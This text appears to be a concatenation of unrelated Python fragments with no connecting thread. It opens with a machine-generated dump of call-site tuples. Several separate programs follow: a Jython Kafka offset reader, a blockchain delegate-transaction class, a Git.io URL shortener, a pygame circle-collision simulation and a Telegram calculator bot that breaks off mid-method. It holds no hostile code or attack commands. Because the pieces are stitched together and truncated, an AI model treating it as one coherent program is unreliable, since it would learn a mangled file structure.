((60539, 60546), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (60544, 60546), False, 'from ndex2.client import Ndex2\n'), ((60888, 60908), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (60906, 60908), False, 'import requests_mock\n'), ((61329, 61336), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (61334, 61336), False, 'from ndex2.client import Ndex2\n'), ((61658, 61678), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (61676, 61678), False, 'import requests_mock\n'), ((62104, 62111), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', 
(62109, 62111), False, 'from ndex2.client import Ndex2\n'), ((62323, 62343), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (62341, 62343), False, 'import requests_mock\n'), ((62759, 62766), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (62764, 62766), False, 'from ndex2.client import Ndex2\n'), ((62977, 62997), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (62995, 62997), False, 'import requests_mock\n'), ((63404, 63411), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (63409, 63411), False, 'from ndex2.client import Ndex2\n'), ((63609, 63629), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (63627, 63629), False, 'import requests_mock\n'), ((63778, 63785), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (63783, 63785), False, 'from ndex2.client import Ndex2\n'), ((64238, 64258), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (64256, 64258), False, 'import requests_mock\n'), ((64394, 64401), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (64399, 64401), False, 'from ndex2.client import Ndex2\n'), ((64627, 64647), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (64645, 64647), False, 'import requests_mock\n'), ((65092, 65099), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (65097, 65099), False, 'from ndex2.client import Ndex2\n'), ((65436, 65456), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (65454, 65456), False, 'import requests_mock\n'), ((65913, 65920), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (65918, 65920), False, 'from ndex2.client import Ndex2\n'), ((66138, 66158), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (66156, 66158), False, 'import requests_mock\n'), ((66605, 66612), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (66610, 66612), False, 'from ndex2.client import Ndex2\n'), ((66829, 66849), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (66847, 66849), False, 'import requests_mock\n'), ((67286, 67293), 
'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (67291, 67293), False, 'from ndex2.client import Ndex2\n'), ((67487, 67507), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (67505, 67507), False, 'import requests_mock\n'), ((67884, 67891), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (67889, 67891), False, 'from ndex2.client import Ndex2\n'), ((68214, 68234), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (68232, 68234), False, 'import requests_mock\n'), ((68595, 68602), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (68600, 68602), False, 'from ndex2.client import Ndex2\n'), ((68937, 68957), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (68955, 68957), False, 'import requests_mock\n'), ((69093, 69100), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (69098, 69100), False, 'from ndex2.client import Ndex2\n'), ((69329, 69349), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (69347, 69349), False, 'import requests_mock\n'), ((69694, 69701), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (69699, 69701), False, 'from ndex2.client import Ndex2\n'), ((69903, 69923), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (69921, 69923), False, 'import requests_mock\n'), ((70274, 70281), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (70279, 70281), False, 'from ndex2.client import Ndex2\n'), ((70489, 70509), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (70507, 70509), False, 'import requests_mock\n'), ((70646, 70653), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (70651, 70653), False, 'from ndex2.client import Ndex2\n'), ((71034, 71054), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (71052, 71054), False, 'import requests_mock\n'), ((71191, 71198), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (71196, 71198), False, 'from ndex2.client import Ndex2\n'), ((71575, 71595), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (71593, 71595), False, 
'import requests_mock\n'), ((71732, 71739), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (71737, 71739), False, 'from ndex2.client import Ndex2\n'), ((72081, 72101), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (72099, 72101), False, 'import requests_mock\n'), ((72412, 72456), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (72417, 72456), False, 'from ndex2.client import Ndex2\n'), ((72605, 72625), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (72623, 72625), False, 'import requests_mock\n'), ((72936, 72980), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (72941, 72980), False, 'from ndex2.client import Ndex2\n'), ((73277, 73297), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (73295, 73297), False, 'import requests_mock\n'), ((73608, 73652), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (73613, 73652), False, 'from ndex2.client import Ndex2\n'), ((74004, 74024), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (74022, 74024), False, 'import requests_mock\n'), ((74335, 74379), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (74340, 74379), False, 'from ndex2.client import Ndex2\n'), ((74764, 74784), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (74782, 74784), False, 'import requests_mock\n'), ((75414, 75458), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (75419, 75458), False, 'from ndex2.client import Ndex2\n'), ((75797, 75817), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (75815, 75817), False, 'import 
requests_mock\n'), ((75953, 75960), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (75958, 75960), False, 'from ndex2.client import Ndex2\n'), ((76192, 76212), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (76210, 76212), False, 'import requests_mock\n'), ((76546, 76590), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (76551, 76590), False, 'from ndex2.client import Ndex2\n'), ((76747, 76767), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (76765, 76767), False, 'import requests_mock\n'), ((77102, 77146), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (77107, 77146), False, 'from ndex2.client import Ndex2\n'), ((77334, 77354), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (77352, 77354), False, 'import requests_mock\n'), ((77491, 77498), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (77496, 77498), False, 'from ndex2.client import Ndex2\n'), ((78570, 78590), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (78588, 78590), False, 'import requests_mock\n'), ((79129, 79136), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (79134, 79136), False, 'from ndex2.client import Ndex2\n'), ((79306, 79326), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (79324, 79326), False, 'import requests_mock\n'), ((79905, 79912), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (79910, 79912), False, 'from ndex2.client import Ndex2\n'), ((2189, 2200), 'numpy.int32', 'np.int32', (['(1)'], {}), '(1)\n', (2197, 2200), True, 'import numpy as np\n'), ((6855, 6862), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (6860, 6862), False, 'from ndex2.client import Ndex2\n'), ((38175, 38209), 'json.dumps', 'json.dumps', (['cx'], {'cls': 'DecimalEncoder'}), '(cx, cls=DecimalEncoder)\n', (38185, 38209), False, 'import json\n'), ((39825, 
39859), 'json.dumps', 'json.dumps', (['cx'], {'cls': 'DecimalEncoder'}), '(cx, cls=DecimalEncoder)\n', (39835, 39859), False, 'import json\n'), ((37985, 38019), 'json.dumps', 'json.dumps', (['cx'], {'cls': 'DecimalEncoder'}), '(cx, cls=DecimalEncoder)\n', (37995, 38019), False, 'import json\n'), ((39635, 39669), 'json.dumps', 'json.dumps', (['cx'], {'cls': 'DecimalEncoder'}), '(cx, cls=DecimalEncoder)\n', (39645, 39669), False, 'import json\n')]
|
import os
import sys
import time
import os.path
import json
import config
import json
sys.path.extend(["lib/"+x for x in os.listdir("lib") if x.endswith('.jar')])
from java.lang import System
from kafka.consumer import SimpleConsumer
#
# offsets_after_time_millis = -1 => get latest offset
# offsets_after_time_millis = -2 => get oldest offset
#
def get_offsets(offsets_after_time_millis,
                conn_params = config.DEFAULT_CONN_PARAMS):
    # Query every configured Bagheera/Kafka broker for the offset of each
    # topic/partition and print one JSON record per combination to stdout
    # via java.lang.System -- this script runs under Jython (note the
    # Python 2 `long` builtin).
    #
    # offsets_after_time_millis: -1 => latest offset, -2 => oldest offset
    #     (any other value: offsets recorded before that epoch-millis time)
    # conn_params: dict with 'port', 'nrecs' and 'bufsize' keys
    #     -- presumably defined in config; confirm against config module.
    curr_time = long(time.time() * 1000)
    for host in config.bagheera_nodes:
        for topic in config.topics:
            for partition in config.partitions:
                consumer = SimpleConsumer(host, conn_params['port'],
                        conn_params['nrecs'], conn_params['bufsize'])
                # Ask the broker for at most one offset before the cutoff time.
                offset = long(consumer.getOffsetsBefore(topic,
                    partition,
                    offsets_after_time_millis, 1)[0])
                consumer.close()
                System.out.println(json.dumps({
                    'time_millis' : curr_time,
                    'hostname' : host,
                    'topic' : topic,
                    'partition' : partition,
                    'offset' : offset
                }))

if __name__ == '__main__':
    # Default run: report the latest offsets.
    get_offsets(-1)
|
[
"kafka.consumer.SimpleConsumer",
"os.listdir",
"json.dumps",
"time.time"
] |
[((122, 139), 'os.listdir', 'os.listdir', (['"""lib"""'], {}), "('lib')\n", (132, 139), False, 'import os\n'), ((476, 487), 'time.time', 'time.time', ([], {}), '()\n', (485, 487), False, 'import time\n'), ((647, 739), 'kafka.consumer.SimpleConsumer', 'SimpleConsumer', (['host', "conn_params['port']", "conn_params['nrecs']", "conn_params['bufsize']"], {}), "(host, conn_params['port'], conn_params['nrecs'], conn_params\n ['bufsize'])\n", (661, 739), False, 'from kafka.consumer import SimpleConsumer\n'), ((1074, 1192), 'json.dumps', 'json.dumps', (["{'time_millis': curr_time, 'hostname': host, 'topic': topic, 'partition':\n partition, 'offset': offset}"], {}), "({'time_millis': curr_time, 'hostname': host, 'topic': topic,\n 'partition': partition, 'offset': offset})\n", (1084, 1192), False, 'import json\n')]
|
from bpl_lib.transactions.Transaction import Transaction
from bpl_lib.helpers.Constants import TRANSACTION_TYPE
from bpl_lib.crypto.Keys import Keys
class Delegate(Transaction):
    """Delegate-registration transaction.

    Instances must be built through the :meth:`generate` or
    :meth:`from_dict` factories, never directly.
    """

    def __init__(self, fee, _error_use_class_method=True):
        """Internal constructor.

        :param fee: fee for the transaction
        :param _error_use_class_method: guard flag -- True means the caller
            bypassed the class-method factories, which is an error
        """
        if _error_use_class_method:
            raise TypeError("Please use Delegate.generate(args) or Delegate.from_dict(args) to construct me.")
        super().__init__(TRANSACTION_TYPE.DELEGATE, fee)

    @classmethod
    def generate(cls, username, secret, second_secret=None, fee=None):
        """Build and sign a new delegate transaction.

        :param username: username of the delegate (string)
        :param secret: secret passphrase (string or bytes)
        :param second_secret: optional second passphrase (string or bytes)
        :param fee: fee for the transaction (integer)
        :return: (Delegate)
        """
        transaction = cls(fee, _error_use_class_method=False)
        transaction._sender_public_key = Keys(secret).get_public_key()
        transaction._asset["delegate"] = {
            "username": username,
            "publicKey": transaction._sender_public_key,
        }
        transaction.sign(secret, second_secret)
        return transaction

    @classmethod
    def from_dict(cls, transaction):
        """Rebuild a delegate transaction from its dict representation.

        :param transaction: transaction (dict)
        :return: (Delegate)
        """
        instance = cls(transaction["fee"], _error_use_class_method=False)
        instance._sender_public_key = transaction["senderPublicKey"]
        instance._timestamp = transaction["timestamp"]
        instance._asset["delegate"] = transaction["asset"]["delegate"]
        instance.sign_from_dict(transaction)
        return instance

    def _handle_transaction_type(self, buffer):
        # Serialise the delegate username into the transaction byte buffer.
        username = self._asset["delegate"]["username"]
        buffer.write_bytes(username.encode())
        return buffer
|
[
"bpl_lib.crypto.Keys.Keys"
] |
[((1224, 1236), 'bpl_lib.crypto.Keys.Keys', 'Keys', (['secret'], {}), '(secret)\n', (1228, 1236), False, 'from bpl_lib.crypto.Keys import Keys\n')]
|
from pyshorteners.base import BaseShortener
from pyshorteners.exceptions import ShorteningErrorException
class Shortener(BaseShortener):
    """Git.io shortener implementation (GitHub URLs only).

    Example:
        >>> import pyshorteners
        >>> s = pyshorteners.Shortener(code='12345')
        >>> s.gitio.short('https://github.com/TEST')
        'https://git.io/12345'
        >>> s.gitio.expand('https://git.io/12345')
        'https://github.com/TEST'
    """

    api_url = "https://git.io"

    def short(self, url):
        """Shorten a GitHub URL via Git.io.

        Args:
            url (str): the URL you want to shorten
        An optional custom permalink may be supplied through the
        ``code`` attribute on the shortener instance.

        Returns:
            str: The shortened URL

        Raises:
            ShorteningErrorException: If the API returns an error as response
        """
        # `code` is optional instance state; fall back to None when unset.
        code = getattr(self, "code", None)
        payload = {"url": url, "code": code}
        response = self._post(self.api_url, data=payload)
        if not response.ok:
            raise ShorteningErrorException(response.content)
        location = response.headers.get("Location")
        if not location:
            raise ShorteningErrorException(response.content)
        return location
|
[
"pyshorteners.exceptions.ShorteningErrorException"
] |
[((1174, 1216), 'pyshorteners.exceptions.ShorteningErrorException', 'ShorteningErrorException', (['response.content'], {}), '(response.content)\n', (1198, 1216), False, 'from pyshorteners.exceptions import ShorteningErrorException\n'), ((1285, 1327), 'pyshorteners.exceptions.ShorteningErrorException', 'ShorteningErrorException', (['response.content'], {}), '(response.content)\n', (1309, 1327), False, 'from pyshorteners.exceptions import ShorteningErrorException\n')]
|
import ABCLogger, pygame as py, numpy, itertools
from Numerical import Numerical
from global_values import *
class CirclesLogger(ABCLogger.ABCLogger):
    """Logger that reports a Circles simulation's next scheduled collision time."""

    def log(self, foreignSelf):
        # Expose the simulation's private countdown as a printable string.
        upcoming = foreignSelf._nextCollisionTime
        return repr(upcoming)
class Circles:
    """Event-driven simulation of elastically colliding circles in a box.

    Two tables cache the predicted collision times: ``circleCircle`` holds
    pairwise circle-circle times (only index pairs with x < y are used) and
    ``circleWall`` holds circle-wall times, one column per wall.
    NOTE(review): ``width``, ``height``, ``wallsNumber`` and ``screen`` are
    presumably provided by the ``global_values`` star import -- confirm.
    """
    def expectedTimeCircles(self, circleA, circleB):
        # Solve |p(t)| = r1 + r2 for the earliest future contact time of two
        # circles; relative linear motion makes this a quadratic in t.
        #TODO refactor this to work without self.time and move it as an unbound method to Circle class
        positionDifference = circleA.currentPosition(self.time) - circleB.currentPosition(self.time)
        velocityDifference = circleA.velocity - circleB.velocity
        radiiSum = circleA.radius + circleB.radius
        leadingCoefficient = velocityDifference[0]**2 + velocityDifference[1]**2
        middleCoefficient = 2*(velocityDifference[0]*positionDifference[0] + velocityDifference[1]*positionDifference[1])
        constantCoefficient = positionDifference[0]**2 + positionDifference[1]**2 - radiiSum**2
        return Numerical.solveQuadraticPrune([leadingCoefficient, middleCoefficient, constantCoefficient]) + self.time
    def expectedTimeWalls(self, circle): # the order is East, West, North, South
        # Yield four absolute times at which the circle's centre reaches each
        # wall (offset inward by its radius); one linear solve per wall.
        wallsHorizontal = [circle.radius, width - circle.radius]
        wallsVertical = [circle.radius, height - circle.radius]
        for horizontal in wallsHorizontal:
            solution = Numerical.solveLinear([circle.velocity[0], circle.currentPosition(self.time)[0] - horizontal])
            yield solution + self.time
        for vertical in wallsVertical:
            solution = Numerical.solveLinear([circle.velocity[1], circle.currentPosition(self.time)[1] - vertical])
            yield solution + self.time
    @staticmethod
    def newVelocitiesCircles(circleA, circleB):
        # Equal-mass elastic collision: exchange the velocity components
        # projected on the line of centres, keep the tangential parts.
        normalVector = circleB.position - circleA.position
        commonFactor = normalVector/numpy.dot(normalVector, normalVector)
        normalComponentA = numpy.dot(circleA.velocity, normalVector)*commonFactor
        normalComponentB = numpy.dot(circleB.velocity, normalVector)*commonFactor
        circleANewVelocity = circleA.velocity - normalComponentA + normalComponentB
        circleBNewVelocity = circleB.velocity - normalComponentB + normalComponentA
        return circleANewVelocity, circleBNewVelocity
    @staticmethod
    def naiveCollisionCheck(circleA, circleB):
        # Direct overlap test: centres closer than the sum of the radii.
        positionDifference = circleB.position - circleA.position
        distance = numpy.linalg.norm(positionDifference)
        radiiSum = circleA.radius + circleB.radius
        return distance < radiiSum
    def isWithinCurrentTimeslice(self, time):
        # True when `time` falls strictly inside the current animation frame,
        # i.e. the open interval (self.time, self.time + 1).
        return time > self.time and time < self.time + 1
    @property
    def circlesNo(self):
        # Number of simulated circles.
        return len(self.circles)
    def __init__(self, circles):
        self.circles = circles
        self.time = 0
        self.circleCircle = numpy.ndarray(shape=([self.circlesNo]*2), dtype = float)
        self.circleWall = numpy.ndarray(shape=([self.circlesNo, wallsNumber]), dtype = float) # the order is East, West, North, South
        self.circleCircle.fill(float("inf"))
        #properties of the next collision. To be modified exclusively by self.whenNextCollision:
        self._nextCollisionTime = 0
        self._isPairOfCircles = False
        self._i = (None, None) # can be (int, int) or (int,)
        self.allPairsCollisions()
        self.allWallsCollisions()
        self.whenNextCollision()
    def allWallsCollisions(self):
        # Refresh the wall-collision table for every circle.
        for circleIndex in range(self.circlesNo):
            self.updateCircleWallEntry(circleIndex)
    def updateCircleWallEntry(self, circleIndex):
        # Recompute all four wall-collision times for one circle.
        for wallIndex, time in enumerate(self.expectedTimeWalls(self.circles[circleIndex])):
            self.circleWall[circleIndex][wallIndex] = time
    def allPairsCollisions(self):
        # Refresh the circle-circle table for every (x < y) index pair.
        for indices in self.yieldPairsIndices():
            self.updateCircleCircleEntry(indices)
    def updateCircleCircleEntry(self, circlesIndices):
        # Recompute the predicted collision time for one circle pair.
        self.circleCircle[circlesIndices] = self.expectedTimeCircles(*(self.circles[index] for index in circlesIndices))
    def yieldPairsIndices(self):
        # Yield each unordered pair of circle indices exactly once (x < y).
        for xIndex in range(0, self.circlesNo - 1):
            for yIndex in range(xIndex + 1, self.circlesNo):
                yield xIndex, yIndex
    def soonestCircleCircleCollision(self):
        # Linear scan of the pair table; returns ((x, y), time) or (None, inf).
        minimum = float("+inf")
        indices = None
        for pair in self.yieldPairsIndices():
            time = float(self.circleCircle[pair])
            if time < minimum:
                minimum = time
                indices = pair
        return indices, minimum
    def soonestCircleWallCollision(self):
        # Linear scan of the wall table; returns ((circle, wall), time)
        # or (None, inf) when the table holds only +inf entries.
        minimum = float("+inf")
        index = None
        for circleIndex in range(self.circlesNo):
            for wallIndex in range(wallsNumber):
                time = float(self.circleWall[circleIndex, wallIndex])
                if time < minimum:
                    minimum = time
                    index = circleIndex, wallIndex
        return index, minimum
    def whenNextCollision(self): # Side effects :(. This function should be exclusive for changing these attributes.
        # Pick whichever collision (pair or wall) happens first and record it
        # in the _isPairOfCircles / _i / _nextCollisionTime triple.
        circles = self.soonestCircleCircleCollision()
        wall = self.soonestCircleWallCollision()
        if circles[1] < wall[1]:
            self._isPairOfCircles = True
            self._i = circles[0]
            self._nextCollisionTime = circles[1]
        else:
            self._isPairOfCircles = False
            self._i = wall[0]
            self._nextCollisionTime = wall[1]
    def carryOutCircleCollision(self):
        assert self._isPairOfCircles == True
        circles = tuple(self.circles[i] for i in self._i)
        newVelocities = self.newVelocitiesCircles(*circles)
        for i, circle in enumerate(circles):
            # Advance each circle to the instant of contact, then swap in
            # its post-collision velocity.
            circle.position = circle.currentPosition(self._nextCollisionTime)
            circle.velocity = newVelocities[i]
            circle.time = float(self._nextCollisionTime)
        for i in self._i:
            self.updateCircleWallEntry(i)
        # The pair just collided: mark it non-pending, then refresh every
        # other pair involving either of the two circles.
        self.circleCircle[self._i] = float("+inf")
        for pairIndex in itertools.chain(self.yieldPairsForIndex(*self._i), self.yieldPairsForIndex(*self._i[::-1])):
            self.updateCircleCircleEntry(pairIndex)
    def carryOutWallCollision(self):
        assert self._isPairOfCircles == False
        # Walls 0/1 (East/West) flip the x velocity, 2/3 (North/South) the y.
        if self._i[1] in [0, 1]:
            component = 0
        else:
            component = 1
        circle = self.circles[self._i[0]]
        circle.position = circle.currentPosition(self._nextCollisionTime)
        circle.velocity[component] *= -1
        circle.time = float(self._nextCollisionTime)
        self.updateCircleWallEntry(self._i[0])
        self.circleWall[self._i] = float("+inf")
        for pairIndex in self.yieldPairsForIndex(*[self._i[0]]*2):
            self.updateCircleCircleEntry(pairIndex)
    #vim mark X set here.
    def carryOutCollision(self):
        # Dispatch to the circle-circle or circle-wall handler.
        assert self.isWithinCurrentTimeslice(self._nextCollisionTime)
        if self._isPairOfCircles:
            self.carryOutCircleCollision()
        else:
            self.carryOutWallCollision()
    def animationStep(self):
        # Process the pending collision if it falls inside this frame,
        # otherwise advance the simulation clock by one frame.
        if self.isWithinCurrentTimeslice(self._nextCollisionTime):
            self.carryOutCollision()
            self.whenNextCollision()
        else:
            self.time += 1
    def yieldPairsForIndex(self, index, withoutIndex):
        # Yield every (x, y) pair containing `index` except the one that also
        # contains `withoutIndex`, preserving the x < y ordering.
        for i in range(index):
            if i != withoutIndex:
                yield i, index
        for i in range(index + 1, self.circlesNo):
            if i != withoutIndex:
                yield index, i
    def animate(self):
        # Main pygame loop: poll events, redraw all circles, step the
        # simulation, forever (quit() on window close).
        while True:
            queue = py.event.get()
            for event in queue:
                if event.type == py.QUIT:
                    quit()
            screen.fill([0,0,0])
            [circle.plot(self.time) for circle in self.circles]
            py.display.update()
            self.animationStep()
|
[
"pygame.event.get",
"Numerical.Numerical.solveQuadraticPrune",
"pygame.display.update",
"numpy.linalg.norm",
"numpy.dot",
"numpy.ndarray"
] |
[((2195, 2232), 'numpy.linalg.norm', 'numpy.linalg.norm', (['positionDifference'], {}), '(positionDifference)\n', (2212, 2232), False, 'import ABCLogger, pygame as py, numpy, itertools\n'), ((2562, 2616), 'numpy.ndarray', 'numpy.ndarray', ([], {'shape': '([self.circlesNo] * 2)', 'dtype': 'float'}), '(shape=[self.circlesNo] * 2, dtype=float)\n', (2575, 2616), False, 'import ABCLogger, pygame as py, numpy, itertools\n'), ((2639, 2702), 'numpy.ndarray', 'numpy.ndarray', ([], {'shape': '[self.circlesNo, wallsNumber]', 'dtype': 'float'}), '(shape=[self.circlesNo, wallsNumber], dtype=float)\n', (2652, 2702), False, 'import ABCLogger, pygame as py, numpy, itertools\n'), ((878, 973), 'Numerical.Numerical.solveQuadraticPrune', 'Numerical.solveQuadraticPrune', (['[leadingCoefficient, middleCoefficient, constantCoefficient]'], {}), '([leadingCoefficient, middleCoefficient,\n constantCoefficient])\n', (907, 973), False, 'from Numerical import Numerical\n'), ((1668, 1705), 'numpy.dot', 'numpy.dot', (['normalVector', 'normalVector'], {}), '(normalVector, normalVector)\n', (1677, 1705), False, 'import ABCLogger, pygame as py, numpy, itertools\n'), ((1727, 1768), 'numpy.dot', 'numpy.dot', (['circleA.velocity', 'normalVector'], {}), '(circleA.velocity, normalVector)\n', (1736, 1768), False, 'import ABCLogger, pygame as py, numpy, itertools\n'), ((1803, 1844), 'numpy.dot', 'numpy.dot', (['circleB.velocity', 'normalVector'], {}), '(circleB.velocity, normalVector)\n', (1812, 1844), False, 'import ABCLogger, pygame as py, numpy, itertools\n'), ((6631, 6645), 'pygame.event.get', 'py.event.get', ([], {}), '()\n', (6643, 6645), True, 'import ABCLogger, pygame as py, numpy, itertools\n'), ((6793, 6812), 'pygame.display.update', 'py.display.update', ([], {}), '()\n', (6810, 6812), True, 'import ABCLogger, pygame as py, numpy, itertools\n')]
|
"""Module of definition controller."""
import logging
from collections import defaultdict
from threading import Lock
from typing import DefaultDict
from uuid import uuid4
from telegram import (InlineKeyboardMarkup, InlineQueryResultArticle,
InputTextMessageContent, Update)
from telegram.ext import (CallbackContext, CallbackQueryHandler,
CommandHandler, InlineQueryHandler, Updater)
from telegram.inline.inlinekeyboardbutton import InlineKeyboardButton
from telegram.message import Message
from telegram.parsemode import ParseMode
from calculator_bot.service.calculator import CalculatorService
class TelegramCalculatorController:
    """Definition Controller for telegram bot inline queries."""

    def __init__(self, token: str, service: CalculatorService) -> None:
        # token: Telegram bot API token; service: calculator backend.
        # locks is keyed by message id; a Lock is created lazily per message.
        self.token = token
        self.service = service
        self.locks: DefaultDict[str, Lock] = defaultdict(Lock)

    def start(self, update: Update, context: CallbackContext) -> None:
        """Send a message when the command /start is issued."""
        if update.message is not None:
            update.message.reply_text(
                'Hi! Try to create a new calculator using /new command')

    def help_command(self, update: Update, context: CallbackContext) -> None:
        """Send a message when the command /help is issued."""
        if update.message is not None:
            update.message.reply_text('Help!')

    def new_command(self, update: Update, context: CallbackContext) -> None:
        """Send a calculator message when the command /new is issued."""
        if update.message is not None:
            update.message.reply_text(
                '__Start typing number to calculate__',
                parse_mode=ParseMode.MARKDOWN,
                reply_markup=self.create_inline_markup_keyboard()
            )

    def inlinequery(self, update: Update, context: CallbackContext) -> None:
        """Handle the inline query."""
        if update.inline_query is not None:
            # Offer a single article that spawns a fresh inline calculator.
            results = [
                InlineQueryResultArticle(
                    id=str(uuid4()),
                    title='Create new calculator',
                    input_message_content=InputTextMessageContent(
                        '__Start typing number to calculate__',
                        parse_mode=ParseMode.MARKDOWN
                    ),
                    reply_markup=self.create_inline_markup_keyboard()
                )
            ]
            update.inline_query.answer(results)

    def callbackquery(self, update: Update, context: CallbackContext) -> None:
        """Handle the callback queries."""
        if update.callback_query:
            # Regular messages carry message_id; inline-mode messages only
            # have inline_message_id, so fall back to that.
            message_id: str = str(update.callback_query.message.message_id \
                    if update.callback_query.message \
                    else update.callback_query.inline_message_id)
            # NOTE(review): the lock is only *checked* here, never acquired;
            # the conditional release() at the bottom frees a lock taken by
            # some other code path -- confirm this is the intended protocol.
            locked = self.locks[message_id].locked()
            expr = update.callback_query.data
            if not expr:
                logging.debug(
                    'failed answering callback query with empty expression')
                return
            result = self.service.get_or_create_calculator(str(message_id))
            if result.is_err:
                logging.error(
                    'failed get or creating calculator for message: %s',
                    result.unwrap_err()
                )
                return
            result = self.service.evaluate_calculator_expression(
                result.unwrap(), expr
            )
            if result.is_err:
                logging.error(
                    'failed evaluating calculator expression: %s', result.unwrap_err())
                return
            calc = result.unwrap()
            # Pad the value so repeated edits keep a stable message width.
            text = ('%g' % calc.value).ljust(50)
            text += ('\n> %s' % calc.expr)
            if update.callback_query.message:
                # Skip the edit when nothing changed (Telegram rejects
                # edits with identical text).
                if text != update.callback_query.message.text:
                    message = update.callback_query.message.edit_text(
                        text,
                        reply_markup=self.create_inline_markup_keyboard()
                    )
                    if not isinstance(message, Message):
                        logging.error(
                            'failed editing callback message: %s', message)
            else:
                # Inline-mode message: edit through the bot API instead.
                message = context.bot.edit_message_text(
                    text,
                    inline_message_id=message_id,
                    reply_markup=self.create_inline_markup_keyboard()
                )
                if not isinstance(message, Message):
                    logging.error(
                        'failed editing callback message: %s', message)
            if locked:
                self.locks[message_id].release()

    def create_inline_markup_keyboard(self) -> InlineKeyboardMarkup:
        """Creates inline keyboard markup for calculators."""
        # 4 rows: digits plus operators; each button's callback_data is the
        # token appended to the calculator expression.
        return InlineKeyboardMarkup([
            [
                InlineKeyboardButton('7', callback_data='7'),
                InlineKeyboardButton('8', callback_data='8'),
                InlineKeyboardButton('9', callback_data='9'),
                InlineKeyboardButton('*', callback_data='*'),
                InlineKeyboardButton('/', callback_data='/')
            ],
            [
                InlineKeyboardButton('4', callback_data='4'),
                InlineKeyboardButton('5', callback_data='5'),
                InlineKeyboardButton('6', callback_data='6'),
                InlineKeyboardButton('+', callback_data='+'),
                InlineKeyboardButton('-', callback_data='-')
            ],
            [
                InlineKeyboardButton('1', callback_data='1'),
                InlineKeyboardButton('2', callback_data='2'),
                InlineKeyboardButton('3', callback_data='3'),
                InlineKeyboardButton('=', callback_data='='),
                InlineKeyboardButton('c', callback_data='c'),
            ],
            [
                InlineKeyboardButton('0', callback_data='0'),
                InlineKeyboardButton('.', callback_data='.'),
            ]
        ])

    def run(self) -> None:
        """Run the bot."""
        updater = Updater(self.token)
        me_info = updater.bot.get_me()
        logging.info('Starting updater for bot: %s', me_info)
        # Get the dispatcher to register handlers
        dispatcher = updater.dispatcher
        # on different commands - answer in Telegram
        dispatcher.add_handler(CommandHandler("start", self.start))
